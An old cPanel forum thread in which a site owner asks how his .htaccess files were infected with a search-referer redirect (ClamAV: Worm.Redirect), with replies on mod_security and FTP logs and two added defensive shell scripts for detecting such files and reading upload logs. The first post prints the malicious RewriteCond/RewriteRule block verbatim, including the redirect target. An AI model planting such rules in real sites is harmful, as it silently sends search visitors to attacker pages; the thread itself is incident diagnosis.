.htaccess uploaded automatically

Discussion in 'General Discussion' started by crazyaboutlinux, Apr 6, 2009.

  1. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16
    I hope someone at the cPanel forum can sort out this issue.

    If you open www.mydomain.com directly in the browser, it loads fine, but

    if you search for this domain in Google and then click on the result, the website redirects to a suspicious site, e.g. bizaz.bij.pl/pop1/go.php?sid=1

    For the last 15 days I have done a lot of research on Google to fix this issue but couldn't find any solution.

    Finally I scanned this website with ClamAV and found Worm.Redirect in the .htaccess file.

    The file looks like this:
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ya.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* bizaz.bij.pl/pop1/go.php?sid=1 [R,L]

    Note: do not click on the above link.

    Scan log:

    /home/sunil/tmp/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.cpanel/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/public_ftp/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.neomail/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.autorespond/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/cpmove.psql.1215962606/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/logs/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/public_html/.htaccess: Worm.Redirect-1 FOUND


    So my question is how to stop this kind of activity on the server.

    Also, I want the log for this user, sunil.

    I wanted to know who did this.

    How can I get the log for the same?

    Nilesh
     
    #1 crazyaboutlinux, Apr 6, 2009
    Last edited by a moderator: Apr 6, 2009
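
Added example (not part of the original thread): a shell scan that lists every .htaccess under a directory in which a RewriteCond on %{HTTP_REFERER} guards a redirecting RewriteRule, the pattern shown in the post above. The function names, the sample tree and the redirect.example.invalid target are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag .htaccess files where a Referer test guards a redirect.

# is_referer_redirect FILE -> exit 0 when a RewriteCond on %{HTTP_REFERER} is
# followed by a RewriteRule that redirects (R flag or absolute URL target).
is_referer_redirect() {
    awk '
        { $0 = tolower($0) }                  # directive names are case-insensitive
        $1 == "rewritecond" { if (index($2, "%{http_referer}")) ref = 1; next }
        $1 == "rewriterule" {
            redirect = ($3 ~ /^https?:\/\//) || ($4 ~ /^\[(.*,)?r(edirect)?(=[^,]*)?(,.*)?\]$/)
            if (ref && redirect) hit = 1
            ref = 0                           # conditions bind to the next rule only
        }
        END { exit !hit }
    ' "$1"
}

# scan_htaccess DIR -> prints the path of each suspicious .htaccess under DIR
scan_htaccess() {
    find "$1" -type f -name .htaccess | sort | while IFS= read -r f; do
        if is_referer_redirect "$f"; then printf '%s\n' "$f"; fi
    done
}

# make_sample DIR -> constructed test tree: one infected file, two benign ones
make_sample() {
    mkdir -p "$1/public_html" "$1/blog" "$1/images"
    cat > "$1/public_html/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://redirect.example.invalid/go.php [R,L]
EOF
    cat > "$1/blog/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
EOF
    cat > "$1/images/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteRule \.(jpg|png)$ - [F]
EOF
}

demo=$(mktemp -d); make_sample "$demo"; scan_htaccess "$demo"; rm -rf "$demo"
```

Run `scan_htaccess /home/sunil` to check a real account; hotlink-protection rules that test the Referer but do not redirect (the images sample) are not reported.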
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,460
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    In another thread started by you, you asked about iframe attacks and I provided you with several links to the longest threads on this topic.

    I still believe your answers are there. They are long threads but there should be enough info to get you going in the right direction.

    You need to read up on it to find the answers, as others have had to do when faced with the same problem you have here.
     
  3. nichiyume

    nichiyume Member

    Joined:
    Nov 18, 2004
    Messages:
    18
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Phoenix, Az
    mod_security would help. Build it with EasyApache and use at least the default rules available in the modsecurity link in WHM.
     
  4. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    mod_security is enabled & running with default rules as available in WHM


    Nilesh
     
  5. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Hi Infopro

    This thread isn't related to iframe
     
  6. yapluka

    yapluka Well-Known Member

    Joined:
    Dec 24, 2003
    Messages:
    301
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    France
    cPanel Access Level:
    Root Administrator
    But the modus operandi might be the same. Did you look into how those .htaccess files were uploaded?
    I would take a guess that they were uploaded through FTP. In this case, the owner of the account (and any other person having FTP access) should thoroughly scan his computer with a good antivirus. Chances are at least one machine is infected with a keylogger or trojan.

    Best of luck :)
     
  7. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    I think this has been done by attackers, so first I changed the FTP password for the same.

    But I still wanted to know who did this. Where can I get the FTP log for the same?
     
  8. yapluka

    yapluka Well-Known Member

    /var/log/messages
     
  9. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Please help with the complete command.
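
Added example (not part of the original thread): one way to pull FTP uploads of .htaccess files for a given account out of /var/log/messages. It assumes the FTP daemon is Pure-FTPd logging to syslog in its usual `(user@ip) [NOTICE] path uploaded` form; the function names and the sample log lines (documentation IP addresses) are constructed.

```shell
#!/bin/sh
# Added example: who uploaded .htaccess files over FTP, and from which address.
# Assumption: Pure-FTPd syslog lines of the form
#   <date> <host> pure-ftpd: (user@ip) [NOTICE] /path/file uploaded  (N bytes, ...)

# ftp_htaccess_uploads USER [LOGFILE] -> "Mon D HH:MM:SS ip path" per matching upload
ftp_htaccess_uploads() {
    awk -v user="$1" '
        /pure-ftpd/ && / uploaded / {
            who = $0
            sub(/^[^(]*\(/, "", who); sub(/\).*$/, "", who)    # keep "user@ip"
            at = index(who, "@")
            if (substr(who, 1, at - 1) != user) next           # other accounts
            path = $0
            sub(/^.*\[NOTICE\] /, "", path); sub(/ +uploaded +\(.*$/, "", path)
            if (path !~ /\/\.htaccess$/) next                  # other files
            print $1, $2, $3, substr(who, at + 1), path
        }
    ' "${2:-/var/log/messages}"
}

# sample_log -> constructed syslog lines for the demonstration (not real data)
sample_log() {
    cat <<'EOF'
Apr  5 22:10:03 host pure-ftpd: (?@203.0.113.7) [INFO] sunil is now logged in
Apr  5 22:10:04 host pure-ftpd: (sunil@203.0.113.7) [NOTICE] /home/sunil/public_html/.htaccess uploaded  (412 bytes, 3.21KB/sec)
Apr  5 22:10:05 host pure-ftpd: (sunil@203.0.113.7) [NOTICE] /home/sunil/logs/.htaccess uploaded  (412 bytes, 2.98KB/sec)
Apr  5 23:41:17 host pure-ftpd: (sunil@198.51.100.20) [NOTICE] /home/sunil/public_html/index.html uploaded  (5120 bytes, 40.10KB/sec)
Apr  5 23:50:00 host pure-ftpd: (other@192.0.2.9) [NOTICE] /home/other/public_html/.htaccess uploaded  (90 bytes, 1.00KB/sec)
EOF
}

log=$(mktemp); sample_log > "$log"; ftp_htaccess_uploads sunil "$log"; rm -f "$log"
```

On the server itself, `ftp_htaccess_uploads sunil` reads /var/log/messages; a rotated log file can be passed as the second argument.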
     